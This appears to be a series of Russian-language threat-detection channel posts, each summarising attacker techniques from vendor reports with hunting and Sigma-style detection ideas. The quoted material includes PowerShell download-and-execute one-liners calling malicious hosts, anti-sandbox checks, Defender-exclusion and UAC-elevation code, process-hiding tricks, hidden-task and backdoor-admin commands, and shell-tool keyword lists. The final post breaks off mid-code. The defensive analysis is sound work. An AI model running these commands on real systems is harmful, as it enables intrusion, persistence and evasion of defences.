Всем привет! 💻✌️

Очередная атака начинается с фишинга ClickFix для доставки RMM NetSupport

Пользователям предлагается выполнить одну из команд:

"PowerShell.exe" -w h -nop -ep Bypass -c "$S='hxxps://riverlino[.]com/U.GRE';$j=$env:TEMP+'\1.ps1';(New-Object Net.WebClient).DownloadFile($S,$j);powershell -f $j" 

"PowerShell.exe" -w h -nop -c "&('iex') (New-Object IO.StreamReader([Net.WebRequest]::Create('https://xunira[.]cloud/C[.]GRE').GetResponse().GetResponseStream())).ReadToEnd()" 

В отчете отлично расписан функционал загружаемого PS1:

🔤Декодированние base64 и преобразование его в JSON.
JSON устроен интересно ключ - это список в котором каждая запись содержит два ключа имя файла и содержимое файла в base64, например:

{"MLh0b": [{"Heg": "client32.exe", "VnZv":"TVqQAAMAA"}]}

🔤Создает скрытый системный каталог для дропера в C:\Users\Public\{\w\d+}
🔤Декодириует ключи JSON и записывает в скрытую папку
🔤Закрепляется с помощью ярлыка в папке %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
🔤Проверяет, что все файлы, связанные с NetSupport, успешно записаны на диск
🔤Запускает клиент NetSupport, в данном случае он называется client32.exe

В другой кампании у PS1 появился функционал антифорензики - удаление ключей RunMRU

Remove-ItemProperty -Path- 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name * -ErrorAction SilentlyContinue

🔭 Обнаружение:

🔤 Обнаружение командлетов Powershell Get-Random, FromBase64String, System.Text.Encoding, Attributes, Wscript.Shell, CreateShortcut

🔤 Создание файлов и директорий в C:\Users\Public\ , в исключение можно добавить explorer.exe

🔤 создание скриптами файлов в %APPDATA%\Microsoft\Windows\Start

🔤 удаление ключей реестра из HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

P.S. не замечал в других отчетах рекомендации по отключению диалогого окна Выполнить

User Configuration > Administrative Templates > Start Menu and Taskbar > Enable “Remove Run menu from Start Menu”

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Коллеги из ЛК обнаружили шпионскую кампанию, которая использовала 0-day уязвимость в браузере Chrome - позволяет выполнить код за пределами песочницы

🔤Атака начинается с фишингового письма, которое побуждает пользователя перейти по ссылке
🔤После перехода веб-сайт валидировал пользователя и запускал эксплойт
🔤Если пользователь подтверждался валидатор обменивается ключами с C2-сервером и расшифровывает следующий этап, который скрыт в запросах к файлам шрифтов bootstrap.bundle.min.js и .woff2
🔤Эксплойт позволяет получить дексриптор потока браузера, и выполнить вредоносный код в процессе браузера
🔤Следующий этап для закрепления использовал технику COM hijacking - HKCU\Software\Classes\CLSID\{AA509086-5Ca9-4C25-8F95-589D3C07B48A}\InProcServer32 - %AppData%\...\twinapi.dll

🔭 Обнаружение:

🔤 у sigma есть правило для обнаружения загрузки DLL не из системных путей
🔤 отслеживать изменение значений в ключах реестра HKCU\Software\Classes\CLSID\*\InProcServer32

p.s. разработчики firefox выявили схожую закономерность в своем IPC-коде и выпустили обновление под CVE-2025-2857

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Продолжим разбор шпионской кампании ForumTroll
Атакующие использовали шпионское ПО LeetAgent - его команды написаны Leet стилем:

🔤 0xC033A4D - COMMAND
🔤 0xECEC - EXEC
🔤 0x6E17A585 - GETTASKS

У ВПО есть функционал кейлоггера и стиллера для документов - *.doc, *.xls, *.ppt, *.rtf, *.pdf, *.docx, *.xlsx, *.pptx

Для хостинга C2 использовалась инфраструктура, задействующая Fastly.net

Исследователям удалось атрибутировать кампанию и откатить её активность как минимум до 2022 года. Векторы распространения — фишинг

🔤 Балтийский_Вектор_2023.iso
🔤 DRIVE.GOOGLE.COM (исполняемый файл)
🔤 Приглашение_Россия-Беларусь_крепкое_партнёрство_2024.lnk

Также удалось обнаружить схожую кампанию:
🔤 SCAN_XXXX_<DATE>.pdf.lnk
🔤 <DATE>_winscan_to_pdf.pdf.lnk
🔤 Ростелеком.pdf.lnk

По набору ТТП исследователи подтвердили связь между операциями. В рамках кампании был обнаружен коммерческий вредонос Dante

Dante имеет большой набор проверок на запуск в песочнице,

но из всех выделяется проверка строк в журналах событий Windows

Вредонос проверяет строки связанные с виртуальными машинами и утилитами для реверса

У каждой жертвы Dante есть infection-GUID на основе которого формируется имя директории для хранения остальных модулей и ключ реестра для настроек.

Папка с модулями Dante расположена в %LocalAppData%. Ее имя представляет собой строку в Base64 длиной в восемь байт. В ней содержатся файлы без расширений с именами в виде строк в Base64 длиной в восемь байт. Имя одного из файлов совпадает с именем папки. Эту информацию можно использовать для того, чтобы идентифицировать активные заражения.

В реестре встречается ключ: HKCU\Software\Classes\.zdmtnd\OpenWithProgids - zdmtnd - часть от Base64(GUID)

🔭Обнаружение:

🔤 хантим названия директорий (?:\w\d){8} и увеличиваем критичность, если внутри файл с таким же именем
🔤 проверяем ключи реестра на наличие аномалий HKCU\Software\Classes\.zdmtnd\OpenWithProgids, где имя расширения/ключа выглядит как Base64-строка

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Давайте познакомимся с TTP атакующих, которые получают доступ эксплуатируя уязвимость в TrueConf

🔤Успешная эксплуатация уязвимости позволяет выполнить инъекцию аргументов в командную строку процесса C:\Program Files\TrueConf Server\httpconf\bin\tc_webmgr.exe

Инъекция команды (успешная эксплуатация BDU:2025-10116, признак эксплуатации):

cmd.exe /s /c "“C:\Program Files\TrueConf Server\tc_server.exe” /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||powershell -c "..."|| /File:"D:\TrueConf\activation\offlinereg.vrg""

🔤Атакующие закрепляются через создание локального пользователя (audit, audit1) и создание сервиса C:\Windows\System32\dfxhost.dll с именем SscpSvc

🔤Создают ssh-туннель. Подключение идет на 443 порт сервера атакующих, позволяет пройти межсетевой без функций NGFW

ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 39433 -p 443 ...@...

🔭 Обнаружение:

🔤 создание локальных пользователей
🔤 наличие подозрительных строк в аргументах tc_webmgr.exe

logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: "\cmd.exe"
    selection_child:
        Image|endswith: "\tc_server.exe"
        CommandLine|contains:
            - '||'
            - '&&'
            - 'powershell'
            - 'pwsh'
            - 'wscript'
            - 'cscript'
            - 'sh'
            - 'bash'
            - 'reg'
            - 'regsvr32'
            - 'bitsadmin'
            - 'mshta'
            - 'rundll32'
            - 'curl'
    condition: all of selection*

🔤

Журнал ошибок веб-сервера TrueConf также может содержать признаки эксплуатации (пример пути: C:\TrueConf\web_logs\error.*.log): error: the required argument for option '--Serial' is missing
Важно: указанная выше строка является однозначным признаком попытки эксплуатации уязвимости (инъекция команды через аргумент /Serial), однако возможно появление эксплоитов, где до инъекции указывается корректный ключ активации.

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Атакующие часто маскируют вредоносы под легитимные системные процессы, подменяя своё отображаемое имя через argv[0]

Пример можно найти в отчете

👨‍💻 Как это может работать?

🔤Процесс запускается как /tmp/.malware
🔤При старте проверяет argv[0]
🔤Если имя не совпадает с ожидаемым - перезапускает себя через execve с поддельным argv[0], например: /usr/lib/systemd/systemd-update

В результате ps, top, htop отображают процесс как легитимный, скрывая его реальное расположение.

💀 Простой пример:

#define _GNU_SOURCE
#include <unistd.h>
#include <string.h>

int main(int argc, char *argv[], char *envp[]) {
    const char *fake = "/usr/lib/systemd/systemd-update";
    if (strcmp(argv[0], fake) != 0) {
        char *new_argv[] = { (char *)fake, NULL };
        execve("/proc/self/exe", new_argv, envp);
    }
    while(1) sleep(60);
}

argv[0] — это первый элемент массива, который передается при вызове функции execve

Для проверки можно использовать скрипт:

for pid in /proc/[0-9]*; do
    exe=$(readlink "$pid/exe" 2>/dev/null)
    cmdline=$(tr '\0' ' ' < "$pid/cmdline" 2>/dev/null)
    if [[ -n "$exe" && -n "$cmdline" ]]; then
        exe_name=$(basename "$exe")
        cmd_name=$(echo "$cmdline" | cut -d' ' -f1 | xargs basename 2>/dev/null)
        if [[ "$exe_name" != "$cmd_name" ]]; then
            echo "SUSP: PID $(basename $pid) | exe=$exe | cmdline=$cmdline"
        fi
    fi
done

Если атакующие удалят файл, то в конце вывода readlink /proc/207349/exe будет (deleted)

#dfir@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Продолжим знакомство с техниками сокрытия процессов - пример можно найти в отчете, а описание метода тут

👨‍💻 Атакующие могут спрятать вредоносный процесс, выполнив bind монтирование:

mount --bind /proc/<легитимный_PID> /proc/<вредоносный_PID>

После этого ps, ls /proc и другие утилиты не будут показывать вредоносный процесс

Давайте запустим вредоносный процесс ping localhost

root        8765  0.1  0.4  14408  8604 ?        Ss   18:20   0:00  \_ sshd: root@pts/2
root        8771  0.5  0.3  13364  7204 pts/2    Ss   18:20   0:00      \_ -zsh
root        8963  0.0  0.1   7340  2532 pts/2    SN   18:21   0:00          \_ ping localhost

Его PID - 8963
Создадим директорию /tmp/hidden и примонтируем ее в /proc/8963

mount --bind /tmp/hidden /proc/8963

В результате выполнения ps -auxfww мы не увидим PID нашего процесса

root        8765  0.0  0.4  14408  8704 ?        Ss   18:20   0:00  \_ sshd: root@pts/2
root        8771  0.5  0.3  13708  7792 pts/2    Ss   18:20   0:01      \_ -zsh
root        9159  0.0  0.1   9908  3240 pts/2    R+   18:24   0:00          \_ ps -auxfww

🔭 Для обнаружения:
🔤 можем проверить вывод mount | grep /proc

/dev/vda1 on /proc/8963 type ext4 (rw,relatime,errors=remount-ro)

🔤 еще одним тригером может быть отсутствие структуры директорий /proc/PID. В моем случае директория пустая

Можем ли мы смонтировать структуру другого процесса, например dockerd? 🧐
Проверим что, там действительно dockerd

# readlink /proc/469/exe

/usr/bin/dockerd

Выполним монтирование

mount --bind /proc/469 /proc/8963

Проверим вывод ps -auxfww

root         469  0.0  3.8 1897816 76868 ?       Ssl  Oct22   3:34 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root         469  0.0  3.8 1897816 76868 ?       Ssl  Oct22   3:34 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock

Теперь у нас два процесса с одинаковым PID - 469

🔤 можем использовать для охоты наличие одинаковых PID, но в выводе mount следы также остаются

#dfir@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Давайте рассмотрим технику, которой атакующие часто пользуются для подмены поведения процессов и сокрытия активности — LD_PRELOAD

В этом отчете хакеры модифицировали поведение юнита systemd - rsyslog.service

👨‍💻 Как это работает?

Systemd читает unit-файлы и drop-in-файлы из стандартных директорий, например:

🔤/etc/systemd/system/*
🔤/lib/systemd/system/*
🔤/run/systemd/system/*
🔤/usr/lib/systemd/system/*
🔤~/.config/systemd/user/*

Атакующие создали папку unintname.d - rsyslog.service.d, и файл с расширением .conf

[Service]
Environment='LD_PRELOAD=libnsan.so'

🔭 Обнаружение:

🔤 одним из способов для хантинга можно проверить содержимое /proc/*/environ

grep -ai "LD_PRELOAD" /proc/*/environ

🔤 можем увидеть путь к подозрительным библиотекам в /proc/PID/maps

7f161cc04000-7f161cc05000 r--p 00000000 fe:01 31256 /usr/lib/systemd/system/rsyslog.service.d/libnsan.so
7f161cc05000-7f161cc06000 r-xp 00001000 fe:01 31256 /usr/lib/systemd/system/rsyslog.service.d/libnsan.so
7f161cc06000-7f161cc07000 r--p 00002000 fe:01 31256 /usr/lib/systemd/system/rsyslog.service.d/libnsan.so
7f161cc07000-7f161cc08000 r--p 00002000 fe:01 31256 /usr/lib/systemd/system/rsyslog.service.d/libnsan.so
7f161cc08000-7f161cc09000 rw-p 00003000 fe:01 31256 /usr/lib/systemd/system/rsyslog.service.d/libnsan.so

🔤 похантить наличие переменной LD_PRELOAD в /etc/profile, /etc/profile.d/*, /etc/environment, ~/.*rc, ~/.profile

p.s. отличная статья про поиск ld_preload

#dfir@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Давайте познакомимся с отчетом коллег из Esentire

👨‍💻 Как это работает?

ClickFix используется для доставки двух нагрузок: NetSupport Manager и Amatera Stealer

🔤Для доставки используется ClickFix, цель которого установить RMM - NetSupport Manager и Amatera Stealer

🔤В качестве нагрузки ClickFix используется mshta.exe, который запускает цепочку powershell-скриптов:

powershell.exe -nopROfi -ExEC UnRESTrictED -WINDOWSTYI HiD -ENc <BASE64>

powershell.exe -ENC <BASE64>

powershell.exe -NoProfile -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command <COMMAND>

Исследователи отмечают использование строки AMSI_RESULT_NOT_DETECTED как ключа для bxor и последующую перезапись функции AmsiScanBuffer.

🔤Результат цепочки скриптов - запуск .NET-based Downloader, который загружает, расшифровывает и запускает нагрузку с MediaFire

🔤Перед установкой NetSupport проверяется, принадлежит ли компьютер к домену, и есть ли на нем интересные файлы

🔭 Обнаружение и хантинг:

🔤 отслеживаем резолв mediafire.com
🔤 отслеживаем командлеты и строки в Powershell GetMappedFileName, clr.dll, ReadProcessMemory, PAGE_EXECUTE_READWRITE, WriteProcessMemory, AMSI_RESULT_NOT_DETECTED
🔤 поиск белых адресов в командлетах powershell
🔤 создание подозрительных ключей в HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

У The DFIR Report вышел новый отчет по кампании Lynx Ransomware

👨‍💻 Как это работает?

🔤Атака начинается со входа по RDP, при этом нет признаков брутфорса — злоумышленники используют уже валидные учётные данные
🔤Через несколько минут после получения доступа атакующие авторизовались на контроллере домена, используя учетную запись администратора
🔤Для закрепа создали несколько учетных записей и добавили их в админы домена
🔤Злоумышленники провели разведку сети: обнаружили виртуализацию и сетевые шары
🔤Чувствительные файлы были упакованы в архивы через 7-Zip и загружены на temp.sh
🔤На серверах резервного копирования были удалены задания бекапов и запущен Lynx Ransomware

Отдельно стоит отметить использование SoftPerfect Network Scanner

🔭 Обнаружение и хантинг:

🔤 добавление новых пользователей в привилегированные группы
🔤 создание учеток с атрибутом USER_DONT_EXPIRE_PASSWORD
🔤 создание файла netscan* - можем похантить в mft и usn
🔤 авторизации с белых адресов, LogonType 10 и 3
🔤 для YARA можем использовать строку из лицензионного файла SoftPerfect Network Scanner - network-scanner-license
🔤 обнаружение файлов с именем delete.me, которые NetScan создает при проверке записи в сетевых шарах. можем похантить в mft и usn
🔤запуск процесса с метаданными

Product: Network Scanner
Description: Application for scanning networks

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Обнаружена уязвимость CVE-2025-11001 в 7-Zip, позволяющая записывать файлы в произвольные места системы при распаковке архивов. Активно используется в фишинговых кампаниях

👨‍💻 Давайте посмотрим как работает:

🔤Злоумышленник создает специальный архив с символической ссылкой
🔤При распаковке 7-Zip создает ссылку на произвольную директорию (например, C:\Windows\System32)
🔤Файлы из архива записываются по пути ссылки, а не в папку архива (все файлы расположенные в папке с именем симлинка)
🔤Пользователь увидит остальные файлы (не расположенные в папке с именем симлинка)

🔭 Обнаружение:

🔤 обнаруживаем создание файлов процессом 7z*.exe, в подозрительных путях C:\Windows\, С:\Users\*\AppData\, C:\Program Files*\ и с опасными расширениями

🔤 анализируем несоответствие путей, отслеживаем создание файлов с разными путями одним процессом 7z*.exe
Можем брать,например, второй элемент списка из путей и сравнивать их

p.s. оба правила будут фолсить, дополнительно можем проверять, что у архива есть ADS с ZoneId, и если проведена инвентаризация - версию 7z

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Коллеги из PT рассказали про фишинговую кампанию NetMedved, цель которой - установить NetSupport Manager

👨‍💻 Разберём интересный момент: в LNK вынесены проверки на выполнение в песочнице. Обычно такие проверки встречаются на 2–3 этапе, но здесь они — сразу в LNK.

🔤 жертвам рассылаются письма с вложенными архивами

🔤 в архиве находятся: LNK, DOCX и PDF — документы маскируются под деловую переписку российских компаний.

🔤LNK файл выполняет проверки на antisandbox:

проверка процессов для анализа программ

Get-Process | Where-Object {$_Name -match 'filemon|regmon|procexp|procexp64|t cpview|tcpview64|Procmon|Procmon64|vmmap|vmmap64|portmon|processlasso|Wireshark|Fiddler|ida|ida64|ImmunityDebugger|WinDump|x64dbg|x32dbg|OllyDbg|ProcessHacker'})

проверка логических процессоров

((Get-CimInstance Win32_Processor).NumberOfLogicalProcessors -lt 2)

проверка разрешения экрана

([System.Windows.Forms.Screen]:PrimaryScreen.Bounds.Width -lt 800) -or ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height  -lt 600))

🔤 Если проверки пройдены успешно, то создается ps1-файл в LocalAppData с именем сгенерированного GUID

$etdvmovzr = (Get-Item Env:LocalAppData).Value+\'+([guid]:NewGuid())+'.pS1';

🔤с удаленного ресурса загружается ps1-нагрузка и записывается в созданный GUID-файл. Запуск скрипта

irm 'metrics-strange.com/c626b76039054fe7899.ps1' > $etdvmovzr;saps 'powershell' -ArgumentList ('-NoProfile"'-ep"'bypass"."-WindO'HIDD':-File' $etdvmovzr); exit O }"

🔭 Обнаружение:

🔤 отслеживаем создание LNK-файлов в %temp%

ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename contains "\AppData\Local\Temp\" and TargetFilename endswith ".lnk"

🔤 отслеживаем аргументы powershell PrimaryScreen.Bounds.Width, PrimaryScreen.Bounds.Height, 'filemon|regmon|procexp|procexp64|tcpview|tcpview64|Procmon|Procmon64|vmmap|vmmap64|portmon|processlasso|Wireshark|Fiddler|ida|ida64|ImmunityDebugger|WinDump|x64dbg|x32dbg|OllyDbg|ProcessHacker'

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Коллеги из PT рассказали про фишинговую кампанию NetMedved, цель которой - установить NetSupport Manager, в прошлый раз мы рассмотрели LNK-файл, сегодня давайте остановимся на NetSupport Manager

🔭 Обнаружение:

🔤 для работы создается служба Client32 с файлом *\NetSupport\NetSupport Manager\client32.exe

🔤 отслеживаем создание процессов с метаданными

Product: NetSupport Remote Control
Company: NetSupport Ltd

🔤 можем похантить файлы NSM.LIC и NSM.ini

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

PT выпустили описание техник APT31, которые активно используют скрытые задачи планировщика Windows

Для создания скрытой задачи необходимо удалить файл XML и ключ реестра SD (SecurityDescriptor) соответствующей задачи:

reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TEST_TASK" /v SD /f

del %SystemRoot%\System32\Tasks\TEST_TASK /f

🔭 Обнаружение :

🔤 следим за удалением ключей реестра

ProviderName="Microsoft-Windows-Sysmon" and EventId = 12 and EventType = "DeleteValue" and TargetObject = "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\*\SD"

p.s. следует проверить конфиги средств сбора событий и DACL на куст реестра

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Давайте разберем способы обхода обнаружения, которые применялись в фишинговой кампании

👨‍💻 Посмотрим TTP:

🔤Атака начинается с ClickFix (имитируется обновление системы: синий экран с процентами - всё привычно), в результате чего запускается удалённый скрипт через mshta.exe

🔤Приложение hta запускает powershell.exe с командлетами iex (irm https://example.com/asf)

🔤Теперь самое интересное. Скачанный ps1 начинает свою работу с повышения привилегий (UAC) и добавления исключений в Windows Defender

$uQVLE622ThHArk = "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
$uQVLE622ThHArk +=
"; Add-MpPreference -ExclusionPath '$env:WINDIR"
$uQVLE622ThHArk +=
; Add-MpPreference -ExclusionPath '$env: TEMP"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env: USERPROFILE"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env:APPDATA"
$uQVLE622ThHArk += ";
Add-MpPreference -ExclusionPath '$env: LOCALAPPDATA"
$uQVLE622ThHArk += "; Add-MpPreference -ExclusionIpAddress '178.16.55.189', '94.154.35. 25'

🔤Для повышения привилегий атакующие запускают powershell.exe с аргументом -Verb RunAs

$aXNXjSqHUpLoYk = Start-Process powershell.exe
-ArgumentList "-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass - Command
`$ErrorActionPreference='Stop'; $uQVLE622ThHArk" `
 -Verb RunAs `
 -PassThru

И, судя по отчёту, этот функционал запускается в цикле до тех пор, пока пользователь не согласится выдать привилегии

🔤Последним этапом идёт установка RAT или стилера

🔭 Обнаружение:

🔤 отслеживаем аргументы powershell Add-MpPreference, Set-MpPreference, -Exclusion*

🔤 отслеживаем создание новых значений в ключах реестра HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\

🔤 отслеживаем события
ProviderName = "Microsoft-Windows-Windows Defender/Operational" AND EventId=5007 AND NewValue contains "Microsoft\Windows Defender\Exclusions"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Разберём интересную технику загрузки кода в память explorer.exe

Атакующие могут злоупотреблять функционалом изменения иконок для директорий. Иконки хранятся в DLL, и если в DLL есть функция DllMain, то при выборе изображения код из этой функции будет выполнен.

🔭 Обнаружение:

🔤 Обнаружение может быть достаточно шумным. Рекомендуется отслеживать загрузку любых библиотек из директорий пользователя. Правило можно улучшить, добавив корреляцию со временем создания загружаемого файла

ProviderName="Microsoft-Windows-Sysmon" and EventId=7 
and Image endswith "explorer.exe"
and ImageLoaded startswith "C:\Users\" and Signed="false"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Группировка Bloody Wolf использует jar-файлы в фишинговых кампаниях в Центральной Азии

👨‍💻 Посмотрим TTP:

🔤Жертва получает вредоносное письмо с PDF-приманкой, оформление которой имитирует документы Министерства юстиции
🔤Пользователь открывает PDF и ему предлагается перейти по ссылке для загрузки материалов
🔤Перейдя по ссылке пользователь загружает вредоносный JAR-файл, цель которого - установка NetSupport RAT
🔤Для закрепа в JAR-файле предусмотрены 3 варианта:

bat в %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

@echo off
cd /d "C:\Users\Bruno\Documents\[Something]"
start "" "[net support executable].exe"

автозапуск в реестре

cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [something] /t REG_SZ /d "[path to net support executable]"

создание задачи

cmd.exe /c schtasks /TN "[Something]" /TR "[path to netsupport executable]" /SC ONLOGON /RL LIMITED /F /RU "%USERNAME%"

Видим, что используется нестареющая классика)

🔭 Обнаружение:

🔤 следим за запуском javaw.exe c jar-файлами из пользовательских директорий

javaw.exe -jar C:\Users\Administrator\Downloads
Ndec0d327c39044523564721608ab551fffeae7af144b9657c367cd47aeb16a7a
\dec0d327c39044523564721608ab551fffeae7af144b9657c367cd47aeb16a7a.jar

🔤 отслеживаем запуск дочерних процессов от родителя javaw.exe

🔤 можем похантить jar-файлы, у которых есть ADS - Zone.Identifier

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Nextron Systems поделились TTP группировки Silver Fox

Хакеры распространяли вредоносный инсталятор Telegram Desktop для установки ValleyRat, по средствам фишинга и рекламы

Судя по картинке, применяется огромная цепочка процедур из 14 шагов

👨‍💻 Посмотрим TTP:
🔤Жертва запускает вредоносный инсталлятор Telegram
🔤Малварь создает исключение в Windows Defender
🔤В C:\ProgramData\WindowsData дропается защищенный паролем архив и переименованный двоичный файл 7-Zip
🔤 Из архива извлекается исполняемый файл второго этапа men.exe (основной оркестратор) и настоящий инсталлятор Telegram
🔤 В %public%\WindowsData\ вредоносный men.exe создает ряд бинарей: для bypass uac, уязвимый драйвер Nvidia для EDR Silencer, vbe-файл для закрепа в задачи (WindowsPowerShell.WbemScripting.SWbemLocator) и еще один архив
🔤Файлы последнего архива извлекаются в %public%\WindowsData\, и содержат уязвимый к dll sideloading исполняемый файл для запуска ValleyRat

men.exe изменяет список управления доступом для %PUBLIC%\Documents\WindowsData\, чтобы администраторы не могли удалять файлы и каталоги по этому пути.

🔭 Для обнаружения nextron предложили несколько своих вариантов с sigma-правилами:
🔤 создание файлов в C:\ProgramData\WindowsData\
🔤 добавление диска C: в исключение Windows Defender
🔤 обнаружение запуска 7-Zip для извлечения защищенного архива

title: Password Protected Compressed File Extraction Via 7-Zip
description: Detects usage of 7zip utilities (7z.exe, 7za.exe and
7zr.exe) to extract password protected zip files.
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Description|contains: '7-Zip'
    - OriginalFileName:
      - '7za.exe'
  selection_password:
    CommandLine|contains|all:
      - ' -p'
      - ' x '
      - ' -o'
      - ' -y'
  condition: all of selection_*

🔤 создание и запуск подозрительных файлов exe,dll,sys,vbe в/из директории %PUBLIC%
🔤 создание задачи с исполняемым файлом в директории %PUBLIC%

title: Scheduled Task Creation With Command In Users Public Directory
description: Detects creation of a scheduled task whose action command
points to \Users\Public
detection:
  selection:
    EventID: 4698
    TaskContent|contains:
      - '\\Users\\Public\\'
      - '\\\\Users\\\\Public\\\\'
  condition: selection

🔤 создание службы с исполняемым файлом в директории %PUBLIC%

title: Service Creation In Users Public Directory
description: Detects creation of a service running from \Users\Public
detection:
  selection:
    EventID: 4697
    ServiceFileName|contains:
      - '\\Users\\Public\\'
      - '\\\\Users\\\\Public\\\\'
  condition: selection

следим за ключами реестра HKLM\SYSTEM\CurrentControlSet\Services\

🔤 изменение прав доступа на файлы и директории в %PUBLIC%

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Распространение вредоносов через USB-накопители остается актуальным способом. Цепочка заражения описана в отчете AhnLab и Google

👨‍💻 Как это работает?

🔤На USB-накопители размещается ярлык USB Drive.lnk и скрытые папки sysvolume и USB Drive
🔤LNK стартует VBS-скрипт из папки sysvolume (с именем вида u[6 цифр].vbs), который в свою очередь запускает BAT-файл с аналогичным именем из той же директории
🔤BAT открывает для пользователя директорию USB Drive, в которой хранятся оригинальные файлы. Далее, проверяется наличие dat-файла в текущей директории, и файла C:\Windows<SPACE>\System32\printui.dll. Обращаем внимание на наличие пробела в пути Windows<SPACE>
🔤Если C:\Windows<SPACE>\System32\printui.dll - отсутствует, то:

🔤 в Windows Defender добавляется исключение C:\Windows<SPACE>\System32
🔤 копирует легитимный C:\Windows\System32\printui.exe в C:\Windows<SPACE>\System32
🔤 копируется DAT-файл с USB-носителя в C:\Windows<SPACE>\System32\printui.dll
🔤 запускается C:\Windows<SPACE>\System32\printui.exe, который загрузит C:\Windows<SPACE>\System32\printui.dll
🔤 вредоносная DLL регистрируется в службу DcomLaunch, запускает майнер XMRig в %SystemDirectory%\wsvcz и заражает другие съемные накопители

🔭 Обнаружение:

🔤 отслеживаем запуск опасных расширений со съемных накопителей
🔤 отслеживаем запуск и создание файлов по маске \w?[0-9]{6}\.(vbs|dll|dat|bat)
🔤 отслеживаем загрузку в память ImageLoaded = "*\printui.dll" and Signed="false"
🔤 отслеживаем создание исключений в Windows Defender
🔤 отслеживаем наличие пробелов в путях файлов \s\\

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Коллеги из ЛК поделились TTP хактивистских группировок 4BID, BO Team и Red Likho

Для подготовки инфраструктуры к уничтожению запускался ps1-скрипт, одна из возможностей которого создание локального пользователя с параметрами PasswordExpires, Disabled = FALSE и добавление его в группу локальных администраторов

$userName = "[REDACTED]"
$password = "[REDACTED]"
$domain = "."
$userExists = net user $userName 2>$null
$addUser = net user $userName $password /add
wmic useraccount where "name='$userName'" set PasswordExpires=FALSE | Write-Log
wmic useraccount where "name='$userName'" set Disabled=FALSE | Write-Log
$group = (Get-LocalGroup -SID "S-1-5-32-544").Name
net localgroup $group $userName /add | Write-Log

Далее, хост настраивается для автоматического входа с созданным пользователем

Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "AutoAdminLogon" -Value "1" | Write-Log
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultUserName" -Value $userName | Write-Log
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultPassword" -Value $password | Write-Log
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultDomainName" -Value $domain | Write-Log

Второй индикатор подготовки к уничтожению — перевод системы в безопасный режим с сетью:

cmd.exe /Q /c bcdedit /set {current} safeboot network && shutdown -r -f -t 0 1> \Windows\Temp\WsMeHC 2>&1

🔭 Обнаружение:
🔤 мониторинг создания локальных пользователей и их добавления в группу администраторов
🔤 хантим ключи реестра SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
🔤 отслеживаем запуск bcdedit /set {current} safeboot network

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

В фишинговой кампании по распространению UDPGangster 🔫 злоумышленники использовали интересный способ закрепления в системе

👨‍💻 Как это работает?

Атакующие часто используют директорию автозагрузки пользователя. Путь к ней задаётся в реестре:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup

Если изменить значение этого ключа — Windows начнёт запускать программы уже из нового пути, что позволяет скрытно выполнять бинарь при старте системы

🔭 Обнаружение:

🔤 отслеживаем изменения ключа реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup

p.s. можем похантить, найдется что-то интересное...

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Помните, в одном из отчётов упоминалось, что атакующие при попытке UAC Bypass использовали запуск PowerShell-скрипта (.ps1) в цикле, пока пользователь не согласится 🔫

У этого приёма есть отдельное название — UAC Loop

👨‍💻 Как это работает:

Уведомление о повышении привилегий появляется у пользователя снова и снова до тех пор, пока он не нажмёт Да

Больше похоже на психологический террор)

POC код:

 do {
    try {
